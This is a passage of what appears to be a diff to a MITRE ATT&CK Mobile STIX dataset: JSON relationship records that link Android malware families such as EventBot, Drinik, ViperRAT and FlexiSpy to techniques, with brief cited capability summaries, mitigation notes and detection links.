"source_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c23d9eff-1d4e-479f-a114-acc535540a23", + "created": "2023-03-20T18:46:51.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:46:51.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3fd2785f-f0eb-4aa9-8a10-e1c9a88b372a", + "created": "2020-06-26T14:55:13.304Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) can display popups over running applications.(Citation: Cybereason EventBot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a9689f2c-ad8f-4861-8cad-d78e07fd1530", + "type": "relationship", + "created": "2020-01-27T17:05:58.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.213Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain a list of installed applications.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cfa1d194-7401-46ba-bfed-5f311aeb22d3", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. 
Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:13.685Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole contact list data stored both on the the phone and the SIM card.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd952153-4902-4fc4-8e2e-b7c7b8bad7f1", + "created": "2023-01-18T19:13:15.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:11:24.686Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has code to use Firebase Cloud Messaging for receiving C2 instructions.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a76d731b-484c-442a-b1a3-255d8398aefd", + "type": "relationship", + "created": "2019-10-10T15:22:52.545Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "modified": "2019-10-10T15:22:52.545Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect passwords for Wi-Fi networks and online accounts, including Skype, Facebook, Twitter, Google, WhatsApp, Mail, and LinkedIn.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce645a25-160f-443d-b288-fdd108b78a06", + "created": "2020-09-11T16:22:03.269Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. 
Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:00.652Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s call log.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d22f2c45-d6fa-419a-8f25-65ea37529ccc", + "created": "2019-09-04T14:28:15.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:19:04.639Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve calendar event information including the event name, when and where it is taking place, and the description.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f116d99-9ce4-4790-aeda-ad9199d8bf7b", + "created": "2023-02-28T20:31:03.379Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. 
Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:06:56.734Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can send SMS phishing messages to other contacts on an infected device.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--848581bc-bf8f-40e2-871e-cd67042b4adf", + "created": "2023-01-18T19:14:40.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:59:26.448Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use overlays to steal user banking credentials entered into legitimate sites.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ce5bf43-39e1-4afb-a939-1984cc2d235c", + "created": "2022-04-01T18:51:44.595Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "System partition integrity mechanisms, such as Verified Boot, can detect the unauthorized modification of system files.", + "modified": "2022-04-01T18:51:44.595Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--de7e3a71-1152-481c-8e5c-88f53852cab6", + "created": "2022-04-01T15:16:53.239Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, 
+ "description": "", + "modified": "2022-04-01T15:16:53.239Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a67c5611-00bc-4e1a-a1be-2512a2bcf072", + "type": "relationship", + "created": "2020-09-11T15:14:34.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SMS KitKat", + "url": "https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html", + "description": "S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020." + } + ], + "modified": "2020-10-22T17:04:15.708Z", + "description": "Users should be encouraged to be very careful with what applications they grant SMS access to. 
Further, users should not change their default SMS handler to applications they do not recognize.(Citation: SMS KitKat)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71", + "created": "2022-04-18T15:49:00.561Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download text files with commands from an FTP server and exfiltrate data via email.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T15:49:00.561Z", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--95fec5e4-d48a-471f-8223-711cd32659b8", + "created": "2022-04-01T18:49:51.050Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:49:51.050Z", + "relationship_type": "revoked-by", + 
"source_ref": "attack-pattern--9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e135cefa-f019-479d-86eb-438972df73e0", + "created": "2019-09-04T15:38:56.702Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:48:30.652Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) installs boot hooks into `/system/su.d`.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c9b3d86a-9c5e-4fe3-9c1c-dbd0bb89a74b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). 
RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-10-15T19:27:27.997Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) collects and exfiltrates information including IMEI, IMSI, MNC, MCC, nearby Wi-Fi networks, and other device and SIM-related info.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c86918a3-6e41-4dfb-8b18-650fff596801", + "type": "relationship", + "created": "2020-09-11T16:22:03.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T16:22:03.207Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect device photos, PDF documents, Office documents, browser history, and browser bookmarks.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--adc9957c-fa57-4e81-9231-b60f01b69859", + "type": "relationship", + "created": "2020-12-24T22:04:28.010Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.010Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) can download new code to update itself.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e826926-fd5b-407c-adbc-e998058728d3", + "type": "relationship", + "created": "2019-09-04T15:38:56.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." 
+ } + ], + "modified": "2019-09-10T14:59:26.139Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record both incoming and outgoing phone calls, as well as microphone audio.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e59d381-eac6-41c6-a5e6-f9617c10259e", + "type": "relationship", + "created": "2020-06-02T14:32:31.888Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.888Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) obfuscates various pieces of information within the application.(Citation: Volexity Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d027925-7d63-459c-b5a5-48ffb49ba1de", + "created": "2023-03-20T15:57:00.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:57:00.953Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", 
+ "id": "relationship--ce6c7f21-91a5-4d63-bd03-a6b57e025afe", + "created": "2017-10-25T14:48:53.746Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications to protected operating system files. ", + "modified": "2022-03-30T20:07:33.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5d37400f-80f9-4500-9357-185650e5a7b2", + "created": "2023-02-06T18:54:13.573Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:14:02.866Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can use HTTP to communicate with the C2 server.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:32.033Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--825ffecc-090f-44c8-87be-f7b72e07f987", + "created": "2022-04-01T18:43:15.716Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security software can typically detect if a device has been rooted or jailbroken and can inform the user, who can then take appropriate action.", + "modified": "2022-04-01T18:43:15.716Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 